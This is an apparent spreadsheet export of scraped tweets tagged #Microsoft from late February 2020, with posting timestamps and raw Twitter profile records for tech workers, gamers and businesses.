    <t>{'id': 1092091640955760647, 'id_str': '1092091640955760647', 'name': 'Girls Future Ready', 'screen_name': 'GirlsFutureRdy', 'location': 'United States', 'description': 'We invite your to join our growing community of young, talented girls dedicated to their values, ideas and projects ðŸ‘‰ðŸ» PL / EN', 'url': 'https://t.co/JgBbJVohXk', 'entities': {'url': {'urls': [{'url': 'https://t.co/JgBbJVohXk', 'expanded_url': 'http://girlsfutureready.org', 'display_url': 'girlsfutureready.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 123, 'friends_count': 60, 'listed_count': 3, 'created_at': 'Sun Feb 03 16:05:12 +0000 2019', 'favourites_count': 348, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 336, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1092101345165885442/lqxm_zDU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1092101345165885442/lqxm_zDU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1092091640955760647/1549215746',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</si>
  <si>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02:46:45 +0000 2020</t>
  </si>
  <si>
    <t>#MYOB dumps its #macOS product... Looking for an alternative? 
#Citrix Apps and Desktops allows you to run any Windows app on any device (including Mac).  #BOOM 
https://t.co/ed6TmCv4jU
#rhipecloud #CitrixIsHow #Azure #Microsoft #Finance #Accounting</t>
  </si>
  <si>
    <t>{'id': 4512875535, 'id_str': '4512875535', 'name': 'Darren Bennett', 'screen_name': 'darrenbennett76', 'location': 'Melbourne, Victoria', 'description': "I'm a geek, and I dabble in Cloud stuff. All opinions expressed are my own.", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 405, 'friends_count': 855, 'listed_count': 72, 'created_at': 'Thu Dec 17 10:40:05 +0000 2015', 'favourites_count': 1893, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3051,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'http://pbs.twimg.com/profile_images/677439373567090688/hrGq9mEk_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/677439373567090688/hrGq9mEk_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4512875535/1451609287',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</si>
  <si>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02:31:10 +0000 2020</t>
  </si>
  <si>
    <t>If you're not providing your customers with the best sales experience, they'll go somewhere where they can get it. #Microsoft Sales Experience provides you with the tools you need to deliver the best sales experience for your customers. https://t.co/OLhCWqkrq8</t>
  </si>
  <si>
    <t>{'id': 968962415487606785, 'id_str': '968962415487606785', 'name': 'Kaushik Neogi', 'screen_name': 'IKaushikNeogi', 'location': 'New Delhi, India ', 'description': '25, Final-year student of law, photo enthusiast, audiophile, occasional drummer, student turned business freak. @kneogin', 'url': 'https://t.co/8nn94KQZQ0', 'entities': {'url': {'urls': [{'url': 'https://t.co/8nn94KQZQ0', 'expanded_url': 'https://kneoginigmisarch.co.in/', 'display_url': 'kneoginigmisarch.co.in', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 2, 'listed_count': 0, 'created_at': 'Wed Feb 28 21:33:37 +0000 2018', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 129, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/968964885483868164/vNEuubP9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/968964885483868164/vNEuubP9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/968962415487606785/1519857337',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</si>
  <si>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02:30:14 +0000 2020</t>
  </si>
  <si>
    <t>#Windows10 could get a new #StartMenu as #Microsoft appears to kill  one of its most useless #features with finally killing off #LiveTiles for good to be replaced with static icons in a future #update ?</t>
  </si>
  <si>
    <t>Thu Feb 27 02:30:00 +0000 2020</t>
  </si>
  <si>
    <t>My business do not generate data. Business intelligence is not for us. Is your business living this utopia? Know what you may be missing https://t.co/CWV8lB1chW 
#dataviz #dataanalytics #datavizlive #dataprivacy #dashboard #powerbi #microsoft https://t.co/u1FZ5uQGKC</t>
  </si>
  <si>
    <t>{'id': 41790498, 'id_str': '41790498', 'name': 'Sushant Bharti', 'screen_name': 'bhartisushant', 'location': 'India', 'description': 'Co-Founder I Digital Entrepreneur | Digital Transformation | Biz Growth | ICO | Seeker at 366Pi Technologies,  366Pi Consulting', 'url': 'https://t.co/OvZGTMSbar', 'entities': {'url': {'urls': [{'url': 'https://t.co/OvZGTMSbar', 'expanded_url': 'https://366pi.com', 'display_url': '366pi.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3160, 'friends_count': 2806, 'listed_count': 426, 'created_at': 'Fri May 22 10:51:37 +0000 2009', 'favourites_count': 2398, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10425, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '1A080A', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1173498710195462144/sZ-J0w7e_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1173498710195462144/sZ-J0w7e_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/41790498/1492858636', 'profile_link_color': '084B40', 'profile_sidebar_border_color': '4A403F', 'profile_sidebar_fill_color': '1A0D0B', 'profile_text_color': '968184', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 02:27:18 +0000 2020</t>
  </si>
  <si>
    <t>If #Google could have applied for a license sooner, but chose not to(unlike #Microsoft who did &amp;amp; was successful)you best believe they regret it, cos #Huawei &amp;amp; the new Alliance with #Xiaomi #Oppo and #Vivo is showing that they don't need Google services to be successful. https://t.co/PSYYfGaaGH</t>
  </si>
  <si>
    <t>{'id': 26219397, 'id_str': '26219397', 'name': 'SLIM', 'screen_name': 'Slimz09', 'location': 'Australia', 'description': 'Aussie Chinaman, Citizen of the World. A Player in the Game of Life.\nSubscribe to the Slimz YouTube Channel for more Random Cool edits and Vlogs. Link below. ðŸ™‚', 'url': 'https://t.co/1UnhvcIqGz', 'entities': {'url': {'urls': [{'url': 'https://t.co/1UnhvcIqGz', 'expanded_url': 'https://www.youtube.com/user/slimz/videos?view_as=subscriber', 'display_url': 'youtube.com/user/slimz/vidâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 67, 'friends_count': 324, 'listed_count': 9, 'created_at': 'Tue Mar 24 11:40:38 +0000 2009', 'favourites_count': 659, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5093,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'http://pbs.twimg.com/profile_images/1119229531858976768/aVh_fdQg_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1119229531858976768/aVh_fdQg_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/26219397/1427530255',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</si>
  <si>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Feb 27 02:20:08 +0000 2020</t>
  </si>
  <si>
    <t>Since @XamDevSummit is cancelled. Which conference would you choose to go to if you can only do one a year through work? @maddyleger1 @davidortinau @JamesMontemagno @DanJSiegel @xamarinhq #Xamarin #XamarinForms #Microsoft</t>
  </si>
  <si>
    <t>{'id': 31178981, 'id_str': '31178981', 'name': 'James Divis', 'screen_name': 'j_divis', 'location': 'United States', 'description': 'Husband, Father of 6 and love coding!! Xamarin Engineer. Tesla Enthusiast.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 55, 'friends_count': 187, 'listed_count': 1, 'created_at': 'Tue Apr 14 17:50:27 +0000 2009', 'favourites_count': 938, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 106, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '09191A', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1052386673307267072/UGmY1fQu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1052386673307267072/UGmY1fQu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/31178981/1583444931', 'profile_link_color': 'C3C374', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '606062', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 02:19:41 +0000 2020</t>
  </si>
  <si>
    <t>Two days left! Enrollment open for @AnnKEmerys Simple Spreadsheet course. This #Microsoft  #Excel  training has been super useful in my work. It'll be useful to you too! #DepictDataStudio https://t.co/HMfcnliOnI...</t>
  </si>
  <si>
    <t>{'id': 1183187219827306496, 'id_str': '1183187219827306496', 'name': 'NickVsPPT', 'screen_name': 'nickvsppt', 'location': 'Denver, CO', 'description': '#ElectrifyYourData! ðŸ’¥ðŸ’¥ðŸŒˆ Visual communication, DataViz, makeovers, slides, reports. ðŸ“Š Ahoy! Iâ€™m Nick V (He/Him) | Evergreen Data Academy Member ðŸ˜Š', 'url': 'https://t.co/GXxhUvEmgj', 'entities': {'url': {'urls': [{'url': 'https://t.co/GXxhUvEmgj', 'expanded_url': 'http://www.nickvsppt.com', 'display_url': 'nickvsppt.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 364, 'friends_count': 1042, 'listed_count': 7, 'created_at': 'Sun Oct 13 01:07:04 +0000 2019', 'favourites_count': 6099, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 445, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1183210571652575237/GH3ywAZ5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1183210571652575237/GH3ywAZ5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1183187219827306496/1575050882',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</si>
  <si>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02:14:34 +0000 2020</t>
  </si>
  <si>
    <t>Ex-#Microsoft engineer nabbed in #Bitcoin embezzlement scheme - Decrypt: Ex-#Microsoft engineer nabbed in #Bitcoin embezzlement scheme  Decrypt https://t.co/HPY7wOl62Q https://t.co/vC8PXxCp50</t>
  </si>
  <si>
    <t>{'id': 39975891, 'id_str': '39975891', 'name': 'Saeed Valadbaygi', 'screen_name': 'SaeedBaygi', 'location': 'Toronto, Ontario', 'description': 'Founder, Director, Editor, Influencer ðŸ‡¨ðŸ‡¦#FinTech #5G #AI #SmartTrading #BigData #IoT #Blockchain #Crypto #CyberSecurity #FinancialRisk #ESG #SDG #Canada #Iran', 'url': 'https://t.co/rvdQMgeG3Z', 'entities': {'url': {'urls': [{'url': 'https://t.co/rvdQMgeG3Z', 'expanded_url': 'http://saeedvaladbaygi.info', 'display_url': 'saeedvaladbaygi.info', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 13084, 'friends_count': 6288, 'listed_count': 596, 'created_at': 'Thu May 14 11:39:17 +0000 2009', 'favourites_count': 4963, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 267012,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'http://pbs.twimg.com/profile_images/1224252964547723265/uJ0173SQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224252964547723265/uJ0173SQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/39975891/1544519920', 'profile_link_color': '703163',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'regular'}</t>
  </si>
  <si>
    <t>Thu Feb 27 02:14:30 +0000 2020</t>
  </si>
  <si>
    <t>Welcome Wednesday!  | 117/200 Followers! https://t.co/yCF3AOgQi2 #twitch #twitchtv #twitchcommunity #fortnite #FortniteChapter2Season2 #pc #pcgaming #microsoft #fun #WednesdayMotivation #follow #cashcup #live #twitchatreamer</t>
  </si>
  <si>
    <t>Thu Feb 27 02:14:21 +0000 2020</t>
  </si>
  <si>
    <t>Anyone have some xbox codes to share for LIVE!? Ive been wanting to play &amp;amp; been wanting to play!! 
#Xbox #Halo #Microsoft</t>
  </si>
  <si>
    <t>{'id': 328789584, 'id_str': '328789584', 'name': 'John A.ðŸ‡¨ðŸ‡´ðŸ‡ºðŸ‡¸ðŸ‡¬ðŸ‡¹', 'screen_name': 'InSaviour', 'location': 'No Secure Location.', 'description': 'â€¢ Hufflepuff â€¢ #StarWars â€¢ #USC â€¢ #LakeShow', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 553, 'friends_count': 293, 'listed_count': 3, 'created_at': 'Mon Jul 04 01:23:41 +0000 2011', 'favourites_count': 50311, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 26770,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'http://pbs.twimg.com/profile_images/1233950784250712064/3xTK8zZQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233950784250712064/3xTK8zZQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/328789584/1567937004', 'profile_link_color': 'FF691F',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</si>
  <si>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Thu Feb 27 02:12:25 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/0dJASAtuyh 
How To Get Sales Of This Month &amp;amp; Previous 2 Months A Real-World Solution In Power BI - TAIK18 explained in the video link
#MICROSOFT #POWERBI #TAIK18 #DAX
 #MQUERY https://t.co/DL3yjraHDQ</t>
  </si>
  <si>
    <t>Thu Feb 27 02:10:11 +0000 2020</t>
  </si>
  <si>
    <t>Just being honest....#Microsoft https://t.co/RncgQB8KT6</t>
  </si>
  <si>
    <t>Thu Feb 27 02:10:00 +0000 2020</t>
  </si>
  <si>
    <t>We're excited to support ASCII's kickoff #MSP event in Long Beach. Our CRO @josephlandes is onsite to speak with #MSPs about demystifying #Microsoft #Azure. We hope to see you there! https://t.co/JCCKdTwFS9 https://t.co/PTVaS8HX1M</t>
  </si>
  <si>
    <t>Thu Feb 27 02:02:53 +0000 2020</t>
  </si>
  <si>
    <t>Anyone heading to the Microsoft Envision Forum Manufacturing event in Chicago tomorrow? If so, find me near the 3D printers, and the Avanade manufacturing team and I can show off our Dynamics expertise and frontline worker HoloLens 2 experiences. #Avanade #Microsoft https://t.co/Q3E6uX4KUu</t>
  </si>
  <si>
    <t>{'id': 13736002, 'id_str': '13736002', 'name': 'Jeff Vilimek', 'screen_name': 'JeffVilimek', 'location': 'Chicago Suburbs', 'description': 'Regional Technology Innovation Lead and Director of the Chicago Innovation Center at Avanade.', 'url': 'https://t.co/OlXBuS2GD2', 'entities': {'url': {'urls': [{'url': 'https://t.co/OlXBuS2GD2', 'expanded_url': 'http://www.jeffvilimek.com', 'display_url': 'jeffvilimek.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 422, 'friends_count': 254, 'listed_count': 26, 'created_at': 'Wed Feb 20 19:44:35 +0000 2008', 'favourites_count': 229, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 777,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'http://pbs.twimg.com/profile_images/894544742528233472/hWEJkUJj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/894544742528233472/hWEJkUJj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/13736002/1502081722',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</si>
  <si>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02:02:14 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft revises guidance on coronavirus-related supply issues https://t.co/94OL3biYMH via @SiliconANGLE #Microsoft #coronavirus</t>
  </si>
  <si>
    <t>Thu Feb 27 02:00:52 +0000 2020</t>
  </si>
  <si>
    <t>The stream has started! Join the Master Domain for some Apex Legends!! #ApexLegends #Respawn #EA #Mixer #MasterDomain #XBOX #Microsoft 
https://t.co/8FeboC2v36</t>
  </si>
  <si>
    <t>{'id': 182354366, 'id_str': '182354366', 'name': 'Kerry Brown', 'screen_name': 'MasterxBrown', 'location': 'IG: @masterxbrown', 'description': 'Mixer Streamer! Enter the Master Domain... https://t.co/hxcFWeCwEo', 'url': 'https://t.co/rOT5bkihTT', 'entities': {'url': {'urls': [{'url': 'https://t.co/rOT5bkihTT', 'expanded_url': 'https://discord.gg/fjtQKPp', 'display_url': 'discord.gg/fjtQKPp', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/hxcFWeCwEo', 'expanded_url': 'http://mixer.com/Master_x_Brown', 'display_url': 'mixer.com/Master_x_Brown', 'indices': [43, 66]}]}}, 'protected': False, 'followers_count': 125, 'friends_count': 173, 'listed_count': 3, 'created_at': 'Tue Aug 24 12:05:51 +0000 2010', 'favourites_count': 184, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5532,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'http://pbs.twimg.com/profile_images/575514492882305024/qdhYDEJG_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/575514492882305024/qdhYDEJG_normal.jpeg',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</si>
  <si>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02:00:01 +0000 2020</t>
  </si>
  <si>
    <t>#Agro-IT seamlessly shifts highly loaded 1C:ERP solution to the #cloud - #Microsoft #Russia #Azure #ERP https://t.co/Lqz3Rp9MY4 #MSFTAdvocate</t>
  </si>
  <si>
    <t>Thu Feb 27 01:54:19 +0000 2020</t>
  </si>
  <si>
    <t>Gartner has recognised #Microsoft as a Magic Quadrant Leader in Analytics and Business Intelligence platforms, for 13 consecutive years  https://t.co/EA0ezV0ZYL</t>
  </si>
  <si>
    <t>{'id': 1064972977618411520, 'id_str': '1064972977618411520', 'name': 'Mero Limited', 'screen_name': 'MeroLimited', 'location': 'New Zealand', 'description': 'Enterprise-class business analytics consulting', 'url': 'https://t.co/vTLbTwzd9X', 'entities': {'url': {'urls': [{'url': 'https://t.co/vTLbTwzd9X', 'expanded_url': 'http://www.mero.co.nz', 'display_url': 'mero.co.nz', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Tue Nov 20 20:05:18 +0000 2018', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1064984296593678336/o4JXDDd6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1064984296593678336/o4JXDDd6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1064972977618411520/1542748278', 'profile_link_color': '1855EF',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</si>
  <si>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01:50:50 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft on Wednesday said its sales in the current quarter would be lower than it had previously predicted because of coronavirus-related disruptions in Chinese manufacturing. #microsoft #coronavirus #supplychain #china \\ NYT \\  https://t.co/XPmlBfTwRe</t>
  </si>
  <si>
    <t>{'id': 3562941, 'id_str': '3562941', 'name': 'eric', 'screen_name': 'kinolina', 'location': 'west seattle', 'description': 'Seattle-based mobile web developer interested in people, travel, film, culture, language, urban studies, and how tech shapes the way we communicate.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2897, 'friends_count': 5001, 'listed_count': 367, 'created_at': 'Thu Apr 05 22:05:44 +0000 2007', 'favourites_count': 21032, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 57772, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '283023', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/439491720732868608/Vkb37omj_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/439491720732868608/Vkb37omj_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3562941/1516849093', 'profile_link_color': 'A34512', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'DB9207', 'profile_text_color': 'FE5F04', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 01:47:50 +0000 2020</t>
  </si>
  <si>
    <t>When she says shes home alone 
 Instagram:Takkeii_x
Song: Tokyo Drift x Teriyaki Boyz
#playstation #modernwarfare #callofduty #cod #subpargameplay #sony #playstation #xbox #microsoft #gamerguy #gamergirl
https://t.co/QOlnOtv4f2 https://t.co/5M5WAoKeJu</t>
  </si>
  <si>
    <t>{'id': 299374466, 'id_str': '299374466', 'name': 'TVKE_', 'screen_name': 'AquaberryR', 'location': 'California, USA', 'description': 'CA| Subpar Gamer| IG: takkeii_x |', 'url': 'https://t.co/PoTkXwuHtW', 'entities': {'url': {'urls': [{'url': 'https://t.co/PoTkXwuHtW', 'expanded_url': 'https://www.twitch.tv/tvke_', 'display_url': 'twitch.tv/tvke_', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 9, 'friends_count': 9, 'listed_count': 0, 'created_at': 'Mon May 16 00:04:59 +0000 2011', 'favourites_count': 1207, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1234457759556329472/qVYnMrpg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234457759556329472/qVYnMrpg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/299374466/1581494303',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</si>
  <si>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01:47:43 +0000 2020</t>
  </si>
  <si>
    <t>Utilizando o Top Percent | Top With Ties
#microsoft, #sqlserver, #transactsql, #sql https://t.co/1M3NgYYj9e https://t.co/hrpu9hL1fK</t>
  </si>
  <si>
    <t>{'id': 1406843880, 'id_str': '1406843880', 'name': 'ConsultaBD', 'screen_name': 'ConsultaBD', 'location': 'Recife', 'description': 'Twitter do Blog ConsultaBD. http://t.co/eKY5ClyXu2', 'url': 'http://t.co/eKY5ClyXu2', 'entities': {'url': {'urls': [{'url': 'http://t.co/eKY5ClyXu2', 'expanded_url': 'http://consultabd.wordpress.com/', 'display_url': 'consultabd.wordpress.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'http://t.co/eKY5ClyXu2', 'expanded_url': 'http://consultabd.wordpress.com/', 'display_url': 'consultabd.wordpress.com', 'indices': [28, 50]}]}}, 'protected': False, 'followers_count': 27, 'friends_count': 36, 'listed_count': 2, 'created_at': 'Mon May 06 05:26:29 +0000 2013', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 198,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'http://pbs.twimg.com/profile_images/674647781609357312/ht7gvz_U_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/674647781609357312/ht7gvz_U_normal.png',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</si>
  <si>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Feb 27 01:45:22 +0000 2020</t>
  </si>
  <si>
    <t>Scalable Apache JMeter Test Framework using Azure Kubernetes Service and Grafana #azurejp 
#JAZUG https://t.co/cy8ROzwoT3 #microsoft #feedly</t>
  </si>
  <si>
    <t>Thu Feb 27 01:42:25 +0000 2020</t>
  </si>
  <si>
    <t>[Microsoft] Morale among Microsoft's Mixer team is at an all-time low and new management is making it worse.
https://t.co/JtVZHNdGOq
#Microsoft #Mixer #MixerStream #MixerStreamer</t>
  </si>
  <si>
    <t>{'id': 1195608144, 'id_str': '1195608144', 'name': 'GAMETAZER', 'screen_name': 'GAMETAZER', 'location': '', 'description': 'GAMETAZER is a gaming community devoted to serving gaming fans all over the world.\r\n\r\nPC, PlayStation, PS4, PS3, PSVITA, 3DS, Wii, WiiU, Xbox, Xbox360', 'url': 'http://t.co/z5ay1UnB3u', 'entities': {'url': {'urls': [{'url': 'http://t.co/z5ay1UnB3u', 'expanded_url': 'http://www.facebook.com/GAMETAZER', 'display_url': 'facebook.com/GAMETAZER', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 416, 'friends_count': 1884, 'listed_count': 62, 'created_at': 'Tue Feb 19 02:26:34 +0000 2013', 'favourites_count': 3805, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 15342,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'http://pbs.twimg.com/profile_images/3285141701/3fdb9024942b9e3643738057a3c18a3a_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3285141701/3fdb9024942b9e3643738057a3c18a3a_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1195608144/1362003581',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</si>
  <si>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01:41:20 +0000 2020</t>
  </si>
  <si>
    <t>Well its official, became a #Microsoft #MCT today @SharePlicity @Microsoft365 @Office365 #MVPBuzz @SkillMeUp_Learn @Opsgility @pluralsight @LI_learning https://t.co/RXi5crkjQE</t>
  </si>
  <si>
    <t>{'id': 14363601, 'id_str': '14363601', 'name': 'helloitsliam', 'screen_name': 'helloitsliam', 'location': 'Winchester, VA, USA', 'description': 'MVP, MCT, #Security Guy #SharePoint #Office365 #Pluralsight #Opsgility #LinkedInLearning #Running #LDS #British #Expat #Rencore @SharePlicity #ScubaDiving', 'url': 'https://t.co/BRzqHXqAUw', 'entities': {'url': {'urls': [{'url': 'https://t.co/BRzqHXqAUw', 'expanded_url': 'https://www.helloitsliam.com', 'display_url': 'helloitsliam.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4543, 'friends_count': 1716, 'listed_count': 369, 'created_at': 'Fri Apr 11 19:03:05 +0000 2008', 'favourites_count': 6152, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 21819,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False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1109183580117168128/wqpeRq-H_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1109183580117168128/wqpeRq-H_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14363601/1398268400', 'profile_link_color': '2FC2EF',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</si>
  <si>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Feb 27 01:39:53 +0000 2020</t>
  </si>
  <si>
    <t>Meet @sourabh_somani, Lead Developer, #Microsoft #MVP, Author at @CsharpCorner Annual Conference 2020. Book your seat now: https://t.co/PIHKcs3V9I #CsharpCon20 #Developers cc 
@graphitegtc @MindcrackerUS @aspose @mcbeniwal https://t.co/OOvvsr5UCZ</t>
  </si>
  <si>
    <t>{'id': 3191916761, 'id_str': '3191916761', 'name': 'Harish Chand', 'screen_name': 'harishchand314', 'location': 'Mathura, India', 'description': '.NET Developer', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 228179, 'friends_count': 3403, 'listed_count': 1643, 'created_at': 'Tue Apr 21 18:29:47 +0000 2015', 'favourites_count': 141921, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 125668,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'http://pbs.twimg.com/profile_images/1206860595049271296/izGPoZfp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1206860595049271296/izGPoZfp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3191916761/1570297234',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</si>
  <si>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01:37:18 +0000 2020</t>
  </si>
  <si>
    <t>This may be the worst notification I have seen in terms of giving enough time for organizations to plan for change in @Office365 @MicrosoftTeams -&amp;gt; On Feb 26th, #Microsoft announced that on Feb 21st that the #Twitter connector had been retired.
#M365Change https://t.co/cehCjFEOkL</t>
  </si>
  <si>
    <t>Thu Feb 27 01:36:39 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft warning however we suggested exit few weeks back https://t.co/BI1UTxwXQ1 https://t.co/TPIqYSn8Mg</t>
  </si>
  <si>
    <t>{'id': 2200703269, 'id_str': '2200703269', 'name': 'NILESH T KAAHIL DEDHIA', 'screen_name': 'ntdmagic', 'location': 'â¤ ðŸŒŽ', 'description': 'Mission Arjun ,  Equity , Forex, Commodity Strategists.  INVESTMENT Consultant  Bajaj Allianz , Top on google for  Brent Oil Crash', 'url': 'https://t.co/EEG5IOBILj', 'entities': {'url': {'urls': [{'url': 'https://t.co/EEG5IOBILj', 'expanded_url': 'https://in.linkedin.com/in/nilesh-dedhia-80801567', 'display_url': 'in.linkedin.com/in/nilesh-dedhâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2539, 'friends_count': 918, 'listed_count': 58, 'created_at': 'Mon Nov 18 05:21:29 +0000 2013', 'favourites_count': 24152, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 36588,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'http://pbs.twimg.com/profile_images/1234160795874922501/SNjqAB68_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234160795874922501/SNjqAB68_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2200703269/1542242934',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</si>
